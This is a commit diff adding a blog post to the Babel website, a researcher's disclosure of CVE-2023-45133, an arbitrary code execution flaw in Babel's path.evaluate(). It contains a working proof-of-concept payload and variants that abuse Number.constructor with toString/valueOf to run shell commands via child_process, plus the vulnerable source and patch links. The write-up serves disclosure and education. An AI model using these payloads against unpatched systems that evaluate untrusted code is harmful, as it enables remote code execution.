Merge branch 'main' of https://github.com/babel/website into sync-6db…

…c559d
docschina · Oct 18, 2023 · b27e736 · b27e736
2 parents 30547a3 + 6dbc559
commit b27e736
Show file tree

Hide file tree

Showing 2 changed files with 383 additions and 0 deletions.
diff --git a/website/blog/2023-10-16-cve-2023-45133.md b/website/blog/2023-10-16-cve-2023-45133.md
@@ -0,0 +1,383 @@
+---
+layout: post
+title:  "CVE-2023-45133: Finding an Arbitrary Code Execution Vulnerability In Babel"
+author: William Khem Marquez
+authorURL: https://github.com/SteakEnthusiast/
+date:   2023-10-18 0:00:00
+share_text: "CVE-2023-45133: Finding an Arbitrary Code Execution Vulnerability In Babel"
+---
+
+<head>
+  <link rel="canonical" href="https://steakenthusiast.github.io/2023/10/11/CVE-2023-45133-Finding-an-Arbitrary-Code-Execution-Vulnerability-In-Babel/" />
+</head>
+
+On October 10th, 2023, I stumbled upon an arbitrary code execution vulnerability in [Babel](https://github.com/babel/babel/), which was subsequently assigned the identifier CVE-2023-45133. In this post, I’ll walk you through the journey of discovering and exploiting this intriguing flaw.
+
+<!-- truncate -->
+
+:::tip
+This article was originally published on [William Khem Marquez's blog](https://steakenthusiast.github.io/). He also published a series on using Babel to deobfuscate JavaScript code: check it out!
+:::
+
+Those who use Babel for reverse engineering/code deobfuscation love using Babel because of all of the built in functionality it provides. One of the most useful features is the ability to statically evaluate expressions using `path.evaluate()` and `path.evaluateTruthy()`. I have written about this in the previous articles:
+
+- [Constant Folding](https://steakenthusiast.github.io/2022/05/28/Deobfuscating-Javascript-via-AST-Manipulation-Constant-Folding/)
+- [A Peculiar JSFuck-style Case](https://steakenthusiast.github.io/2022/06/14/Deobfuscating-Javascript-via-AST-Deobfuscating-a-Peculiar-JSFuck-style-Case/)
+
+Wait, did I say _statically evaluate_?
+
+## The Exploit
+
+Before delving into the details, let’s take a look at the proof of concept I came up with:
+
+### Proof of Concept
+
+```javascript
+const parser = require("@babel/parser");
+const traverse = require("@babel/traverse").default;
+
+const source = `String({  toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")});`;
+
+const ast = parser.parse(source);
+
+const evalVisitor = {
+  Expression(path) {
+    path.evaluate();
+  },
+};
+
+traverse(ast, evalVisitor);
+```
+
+This simply outputs the result of the `id` command to the terminal, as can be seen below.
+
+```
+┌──(kali㉿kali)-[~/Babel RCE]
+└─$ node exploit.js
+uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),111(bluetooth),115(scanner),138(wireshark),141(kaboxer),142(vboxsf)
+```
+
+Of course, the payload can be adapted to do anything, such as exfiltrate data or spawn a reverse shell.
+
+<img alt="😁" src="/assets/2023-10-16-cve-2023-45133/success.jpg" style={{
+  display: "block",
+  marginLeft: "auto",
+  marginRight: "auto",
+  width: "50%"
+}} />
+
+### Exploit Breakdown
+
+To understand why this vulnerability works, we need to understand the source code of the culprit function, `evaluate`. The source code of `babel-traverse/src/path/evaluation.ts` prior to the fix is archived [here](https://github.com/babel/babel/blob/7e198e5959b18373db3936fa3223c0811cebfac1/packages/babel-traverse/src/path/evaluation.ts)
+
+```typescript
+/**
+ * Walk the input `node` and statically evaluate it.
+ *
+ * Returns an object in the form `{ confident, value, deopt }`. `confident`
+ * indicates whether or not we had to drop out of evaluating the expression
+ * because of hitting an unknown node that we couldn't confidently find the
+ * value of, in which case `deopt` is the path of said node.
+ *
+ * Example:
+ *
+ *   t.evaluate(parse("5 + 5")) // { confident: true, value: 10 }
+ *   t.evaluate(parse("!true")) // { confident: true, value: false }
+ *   t.evaluate(parse("foo + foo")) // { confident: false, value: undefined, deopt: NodePath }
+ *
+ */
+
+export function evaluate(this: NodePath): {
+  confident: boolean;
+  value: any;
+  deopt?: NodePath;
+} {
+  const state: State = {
+    confident: true,
+    deoptPath: null,
+    seen: new Map(),
+  };
+  let value = evaluateCached(this, state);
+  if (!state.confident) value = undefined;
+
+  return {
+    confident: state.confident,
+    deopt: state.deoptPath,
+    value: value,
+  };
+}
+```
+
+When `evaluate` is called on a NodePath, it goes through the `evaluatedCached` wrapper, before reaching the `_evaluate` function which does all the heavy lifting. The `_evaluate` function is where the vulnerability lies.
+
+This function is responsible for recursively breaking down AST nodes until it reaches an atomic operation that can be evaluated confidently. The majority of the base cases are evaluated for atomic operations only (such as for binary expressions between two literals). However, there are a few exceptions to this rule.
+
+The two pieces of the source code we care about are the handling of **call expressions** and **object expressions**, as shown below:
+
+#### Vulnerable Source Code
+
+<details>
+<summary>Relevant <code>_evaluate</code> source code</summary>
+
+```typescript
+const VALID_OBJECT_CALLEES = ["Number", "String", "Math"] as const;
+const VALID_IDENTIFIER_CALLEES = [
+  "isFinite",
+  "isNaN",
+  "parseFloat",
+  "parseInt",
+  "decodeURI",
+  "decodeURIComponent",
+  "encodeURI",
+  "encodeURIComponent",
+  process.env.BABEL_8_BREAKING ? "btoa" : null,
+  process.env.BABEL_8_BREAKING ? "atob" : null,
+] as const;
+
+const INVALID_METHODS = ["random"] as const;
+
+function isValidObjectCallee(
+  val: string
+): val is (typeof VALID_OBJECT_CALLEES)[number] {
+  return VALID_OBJECT_CALLEES.includes(
+    // @ts-expect-error val is a string
+    val
+  );
+}
+
+function isValidIdentifierCallee(
+  val: string
+): val is (typeof VALID_IDENTIFIER_CALLEES)[number] {
+  return VALID_IDENTIFIER_CALLEES.includes(
+    // @ts-expect-error val is a string
+    val
+  );
+}
+
+function isInvalidMethod(val: string): val is (typeof INVALID_METHODS)[number] {
+  return INVALID_METHODS.includes(
+    // @ts-expect-error val is a string
+    val
+  );
+}
+
+function _evaluate(path: NodePath, state: State): any {
+  /** snip **/
+  if (path.isObjectExpression()) {
+    const obj = {};
+    const props = path.get("properties");
+    for (const prop of props) {
+      if (prop.isObjectMethod() || prop.isSpreadElement()) {
+        deopt(prop, state);
+        return;
+      }
+      const keyPath = (prop as NodePath<t.ObjectProperty>).get("key");
+      let key;
+      // @ts-expect-error todo(flow->ts): type refinement issues ObjectMethod and SpreadElement somehow not excluded
+      if (prop.node.computed) {
+        key = keyPath.evaluate();
+        if (!key.confident) {
+          deopt(key.deopt, state);
+          return;
+        }
+        key = key.value;
+      } else if (keyPath.isIdentifier()) {
+        key = keyPath.node.name;
+      } else {
+        key = (
+          keyPath.node as t.StringLiteral | t.NumericLiteral | t.BigIntLiteral
+        ).value;
+      }
+      const valuePath = (prop as NodePath<t.ObjectProperty>).get("value");
+      let value = valuePath.evaluate();
+      if (!value.confident) {
+        deopt(value.deopt, state);
+        return;
+      }
+      value = value.value;
+      // @ts-expect-error key is any type
+      obj[key] = value;
+    }
+    return obj;
+  }
+
+  /** snip **/
+  if (path.isCallExpression()) {
+    const callee = path.get("callee");
+    let context;
+    let func;
+
+    // Number(1);
+    if (
+      callee.isIdentifier() &&
+      !path.scope.getBinding(callee.node.name) &&
+      (isValidObjectCallee(callee.node.name) ||
+        isValidIdentifierCallee(callee.node.name))
+    ) {
+      func = global[callee.node.name];
+    }
+
+    if (callee.isMemberExpression()) {
+      const object = callee.get("object");
+      const property = callee.get("property");
+
+      // Math.min(1, 2)
+      if (
+        object.isIdentifier() &&
+        property.isIdentifier() &&
+        isValidObjectCallee(object.node.name) &&
+        !isInvalidMethod(property.node.name)
+      ) {
+        context = global[object.node.name];
+        // @ts-expect-error property may not exist in context object
+        func = context[property.node.name];
+      }
+
+      // "abc".charCodeAt(4)
+      if (object.isLiteral() && property.isIdentifier()) {
+        // @ts-expect-error todo(flow->ts): consider checking ast node type instead of value type (StringLiteral and NumberLiteral)
+        const type = typeof object.node.value;
+        if (type === "string" || type === "number") {
+          // @ts-expect-error todo(flow->ts): consider checking ast node type instead of value type
+          context = object.node.value;
+          func = context[property.node.name];
+        }
+      }
+    }
+
+    if (func) {
+      const args = path
+        .get("arguments")
+        .map((arg) => evaluateCached(arg, state));
+      if (!state.confident) return;
+
+      return func.apply(context, args);
+    }
+  }
+  /** snip **/
+}
+```
+
+</details>
+
+#### Handling of Call Expressions
+
+The first thing to understand is that while call expressions can indeed be evaluated, they are subject to a whitelist check, relying on the `VALID_OBJECT_CALLEES` or `VALID_IDENTIFIER_CALLEES` arrays.
+
+Additionally, there are three cases for handling call expressions:
+
+1. When the callee is an identifier, and the identifier is whitelisted in `VALID_OBJECT_CALLEES` or `VALID_IDENTIFIER_CALLEES`.
+2. When the callee is a member expression, the object is an identifier, the identifier is whitelisted in `VALID_OBJECT_CALLEES`, and the property is not blacklisted in `INVALID_METHODS`.
+3. When the callee is a member expression, the object is a literal, and the property is a string/numeric literal.
+
+The most interesting one is the second case:
+
+```typescript
+if (
+  object.isIdentifier() &&
+  property.isIdentifier() &&
+  isValidObjectCallee(object.node.name) &&
+  !isInvalidMethod(property.node.name)
+) {
+  context = global[object.node.name];
+  // @ts-expect-error property may not exist in context object
+  func = context[property.node.name];
+}
+
+/** snip **/
+if (func) {
+  const args = path.get("arguments").map((arg) => evaluateCached(arg, state));
+  if (!state.confident) return;
+
+  return func.apply(context, args);
+}
+```
+
+The only blacklisted method is `random`, which is a method of the `Math` object. This means that any other method of either the whitelisted `Number`, `String`, or `Math` objects can be directly referenced.
+
+In JavaScript, all classes are functions. Since `Number` and `String` are global JavaScript classes, their `constructor` property points to the `Function` constructor.
+
+Therefore, the two expressions below are equivalent:
+
+```javascript
+Number.constructor('javascript_code_here;');
+Function('javascript_code_here;');
+```
+
+Passing in an arbitrary string to the `Function` constructor returns a function that will evaluate the provided string as JavaScript code when called.
+
+The AST node generated by `Number.constructor('javascript_code_here;')` contains:
+
+- A call expression, where
+  - The callee is a member expression, where
+    - The object is an identifier, with name whitelisted by `VALID_OBJECT_CALLEES`
+    - The property is an identifier, not blacklisted by `INVALID_METHODS`
+  - The arguments are a single string literal, containing the code to be executed.
+
+Therefore, the code is considered safe to evaluate, and we have successfuly crafted a malicious function.
+
+However, it is crucial to note that this _cannot call the function on its own_. It only **creates an anonymous function**.
+
+So, how exactly _can_ we call the function? This is where the second piece of the puzzle comes in: **object expressions**.
+
+#### Handling of Object Expressions
+
+Within Babel’s `_evaluate` method, an `ObjectExpression` node undergoes recursive evaluation, producing a true JavaScript object. There’s no limitation on key names for `ObjectProperty`. As long as every `ObjectProperty` child in the `ObjectExpression` yields `confident: true` from `_evaluate()`, we can obtain a JavaScript object with custom keys/values.
+
+A key property to leverage is `toString` ([MDN Reference](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/toString)). Defining this property on an object to a function we control will allow us to execute arbitrary code when the object is converted to a string.
+
+This is exactly what we do in the payload:
+
+```javascript
+String(({  toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
+```
+
+We’ve assigned our malicious function, crafted via the `Function` constructor, to the `toString` property of the object. Thus, when this object undergoes a string conversion, it gets triggered and executed.
+
+In the provided example, we pass the object to the `String` function, given its status as a whitelisted function (referenced in case 1). Still, the `String` constructor isn’t mandatory. Implicit type coercion in JavaScript can also trigger our malicious function, as demonstratedin these alternative payload formats:
+
+```javascript
+""+(({  toString: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
+```
+
+```javascript
+1+(({  valueOf: Number.constructor("console.log(process.mainModule.require('child_process').execSync('id').toString())")}));
+```
+
+The first example employs type-coercion to transform the object into a string. In contrast, the second example utilizes type-coercion to convert it into a number, as detailed in [Object.prototype.valueOf()](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/valueOf). Both examples exploit the `_evaluate()` method’s approach to handling `BinaryExpression` nodes, which directly performs the operation after recursively evaluating the left and right operands.
+
+## The Patch
+
+Upon disclosing this vulnerability, I was impressed by the swift response from the Babel team, who promptly rolled out a patch. This patch was released in two parts:
+
+The first of which was a workaround for all of the affected official Babel packages, by guarding the calls to `evalute()` with an `isPure()` check. [isPure](https://github.com/babel/babel/blob/4c155667cf50291132089a4556cd3c6cc9d2e640/packages/babel-traverse/src/scope/index.ts#L871) inherently prevents this bug, as it returns false for all `MemberExpression` nodes. [PR #16032: Update babel-polyfills packages](https://github.com/babel/babel/pull/16032)
+
+The subsequent step involved refining the `evaluate()` function. This adjustment ensured that all inherited methods, not only `constructor`, were prevented from being called. [PR #16033: Only evaluate own String/Number/Math methods](https://github.com/babel/babel/pull/16033)
+
+After the fixes were implemented, GitHub staff issued [**CVE-2023-45133**](https://github.com/advisories/GHSA-67hx-6x53-jw92) for the security advisory.
+
+## A side note on disclosure timing
+
+You might have noticed that this blog post was released on the same day as the security advisory. Usually for critical vulnerabilities, it’s customary to wait a while before disclosing a proof of concept. However, I believe this disclosure timing is justifiable for a few reasons:
+
+Predominantly, the vast majority of Babel users remain unaffected by this vulnerability. Babel is primarily utilized for refactoring and transpiling **one’s own code**, which means the typical use case doesn’t expose users to this risk. It’s improbable that many have server-side implementations that accept and process arbitrary code from users through the compilation plugins or the invocation of `path.evaluate`. Furthermore, there are really only a couple real use-cases for using Babel to analyze untrusted code on the server-side:
+
+1.  Reverse engineering bot mitigation software, etc.
+2.  Malware analysis
+
+In the first case, I doubt any legitimate bot mitigation entity would try to attempt Remote Code Execution (RCE) due to the legal ramifications. Meanwhile, professionals using Babel for malware reversal possess the expertise to conduct their analyses within controlled, sandboxed environments. Thus, the risk to the community, in real-world scenarios, remains minimal.
+
+## Conclusion
+
+Discovering and delving into this vulnerability was a fun experience. I initially stumbled upon the vulnerability during a brainstorming session for a Babel-based challenge for UofTCTF’s upcoming capture the flag competition, where I was focusing on an entirely different, non-security-related “bug”.
+
+This vulnerability predominantly impacts those integrating untrusted code with Babel. Unfortunately, this places individuals leveraging Babel for “static deobfuscation” directly in the crosshairs of this attack vector.
+
+There’s a touch of irony in the fact that my first credited CVE emerged from reverse engineering Babel - the very tool I often employ for reverse engineering JavaScript, and the topic of all of my previous posts 🤣.
+
+This was a great learning experience, and hopefully this write-up was useful to you as well. Thanks for reading, and take care!
+
+## References
+
+- [CVE-2023-45133](https://www.cve.org/CVERecord?id=CVE-2023-45133)
+- [GitHub Advisory Database: Arbitrary code execution when compiling specifically crafted malicious code](https://github.com/advisories/GHSA-67hx-6x53-jw92)
diff --git a/website/static/assets/2023-10-16-cve-2023-45133/success.jpg b/website/static/assets/2023-10-16-cve-2023-45133/success.jpg